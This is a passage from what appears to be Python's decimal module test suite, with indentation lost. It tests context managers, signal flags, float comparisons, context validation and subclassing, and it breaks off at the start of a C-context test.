self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(C.__libmpdec_version__, P.__libmpdec_version__)
x = dir(C)
y = [s for s in dir(P) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
